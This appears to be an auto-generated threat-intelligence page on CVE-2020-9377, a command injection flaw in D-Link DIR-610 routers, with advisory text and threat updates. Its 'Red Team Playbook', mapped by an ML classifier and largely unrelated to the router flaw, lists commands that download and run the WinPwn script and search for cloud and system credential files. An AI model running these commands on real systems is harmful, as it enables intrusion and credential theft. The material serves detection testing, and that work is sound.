CVE-2020-9377
Overview
This vulnerability is a command injection flaw rooted in improper input validation of the 'cmd' parameter within the command.php script on D-Link DIR-610 firmware. The affected component directly executes user-supplied input as system commands without adequate sanitization, enabling arbitrary command execution on the device's operating system level. This issue exclusively impacts legacy firmware versions of the DIR-610 router model that are no longer supported by the vendor.
Vulnerability Description
D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
Impact
An attacker with network access to the vulnerable device can execute arbitrary system commands remotely without requiring user interaction. This enables full control over the device, including modifying configurations, intercepting network traffic, or pivoting to internal networks. The vulnerability requires only low-level authentication or potentially no authentication depending on device configuration, facilitating unauthorized administrative access and complete compromise of the router’s functionality and security posture.
Solution
D-Link has issued an advisory (SAP10182) indicating that affected DIR-610 devices are no longer supported and no firmware updates will be provided. The vendor recommends discontinuing use of these legacy devices. For detailed guidance, refer to the official D-Link support announcement at https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182. Users should replace the DIR-610 with a supported model to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in D-Link DIR-610 devices is characterized by a remote command execution flaw that arises from improper handling of the `cmd` parameter in the `command.php` script. This weakness allows an attacker to execute arbitrary commands on the device's operating system, potentially leading to complete system compromise. The issue stems from insufficient input validation, which fails to sanitize user input properly. As a result, an attacker can craft a malicious request that exploits this oversight, gaining unauthorized access to the underlying system and executing commands with the privileges of the web server process.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving network-based interactions. An attacker can send specially crafted HTTP requests to the affected device, targeting the vulnerable `command.php` endpoint. Given that the flaw allows for remote execution, an attacker does not need physical access to the device, making it particularly dangerous. Scenarios may include an attacker gaining access to sensitive data stored on the device, altering configurations, or even using the compromised device as a launchpad for further attacks within the network. The ability to execute arbitrary commands can also lead to the installation of malware or the creation of backdoors, further compromising network security.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on affected devices for their operations. Organizations using D-Link DIR-610 routers may face severe risks, including data breaches, loss of sensitive information, and potential regulatory repercussions. The exploitation of this vulnerability could lead to unauthorized access to corporate networks, allowing attackers to pivot and target other critical systems. Furthermore, the fact that the affected products are no longer supported by the manufacturer exacerbates the risk, as there are no patches or updates available to mitigate the vulnerability. This lack of support can leave organizations vulnerable to ongoing threats, increasing the likelihood of successful attacks.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, network monitoring tools can be employed to identify suspicious traffic patterns or unauthorized access attempts targeting the vulnerable devices. Regular vulnerability assessments and penetration testing can also help identify potential weaknesses in the network infrastructure. Additionally, organizations should consider segmenting their networks to limit the exposure of vulnerable devices and restrict access to sensitive systems. For affected devices that are no longer supported, it is advisable to replace them with newer, supported models that receive regular security updates. In the interim, disabling remote management features and implementing strong firewall rules can help reduce the attack surface.
In conclusion, the remote command execution vulnerability in D-Link DIR-610 devices poses a substantial risk to organizations that utilize these products. The potential for exploitation through crafted requests highlights the importance of robust input validation and secure coding practices. Given the lack of support for affected devices, organizations must take proactive measures to detect, mitigate, and ultimately replace vulnerable hardware to safeguard their networks and sensitive data from malicious actors. The implications of this vulnerability extend beyond immediate technical concerns, emphasizing the need for a comprehensive approach to cybersecurity that encompasses both technology and organizational policies.
Recent CSURFACE threat intelligence indicates a marked escalation in activity related to CVE-2020-9377, as evidenced by new detections emerging within our telemetry. This vulnerability’s inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog underscores its growing operational relevance and prioritization by federal cybersecurity authorities. Concurrently, the assignment of a CVSS score of 8.8 reflects a formal recognition of its high severity, elevating its risk profile significantly. The appearance of an EPSS score above 0.2, despite a recent downward trend, signals a non-negligible likelihood of exploitation attempts in the near term. Although no novel exploit techniques or ransomware associations have been identified, the convergence of these factors indicates an increased threat posture for networks utilizing affected D-Link DIR-610 devices. Defenders should interpret these developments as a clear indication that adversaries may be actively scanning for or attempting to leverage this vulnerability, thereby necessitating heightened vigilance in monitoring and detection efforts. Overall, the updated intelligence elevates the urgency of addressing this vulnerability within risk management frameworks, reflecting a shift from theoretical concern to practical exploitation risk.
Update 2 — July 08, 2026
CSURFACE threat intelligence has identified a notable surge in activity exploiting CVE-2020-9377 targeting D-Link DIR-610 devices. While no new exploit variants or ransomware affiliations have emerged, the increased frequency of detections indicates adversaries are intensifying reconnaissance or attempted exploitation efforts against this vulnerability. This uptick is particularly significant given the affected devices are no longer supported, which inherently limits patch availability and heightens exposure. Consequently, the threat landscape for networks utilizing these devices has shifted from a primarily theoretical risk to a more active exploitation phase. Although the EPSS score remains stable and low relative to other vulnerabilities, the observed telemetry trend underscores the need for defenders to maintain heightened situational awareness. This development elevates the practical risk level, emphasizing that attackers are increasingly probing legacy infrastructure, thereby increasing the likelihood of successful compromise if mitigations are not in place.
Update 3 — July 18, 2026
CSURFACE threat intelligence has identified a marked escalation in activity targeting the CVE-2020-9377 vulnerability on D-Link DIR-610 devices. Our telemetry indicates a doubling in detection frequency, signaling increased adversary interest and probing efforts against this legacy infrastructure. Although no new exploit variants or ransomware affiliations have been observed, this surge reflects a shift from opportunistic scanning to more persistent reconnaissance, which could presage active exploitation attempts. The stable EPSS score suggests the broader exploitability landscape remains unchanged; however, the intensified targeting elevates the practical risk for organizations still operating these unsupported devices. Defenders should interpret this trend as an indicator of growing attacker focus on aging network equipment, underscoring the urgency of maintaining vigilant monitoring despite the product’s end-of-life status.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dir-610 Firmware | N/A |
cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
44%
|
High | High | |
| CAPEC-6 | Argument Injection |
43%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-9377 |
| dlink.com.br |
GitHub CVE
x_refsource_MISC
|
https://www.dlink.com.br/produto/dir-610/ |
| supportannouncement.us.dlink.com |
GitHub CVE
x_refsource_CONFIRM
|
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182 |
| gist.github.com |
GitHub CVE
x_refsource_MISC
|
https://gist.github.com/GouveaHeitor/131557f9de7d571f118f59805df852dc |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-9377 |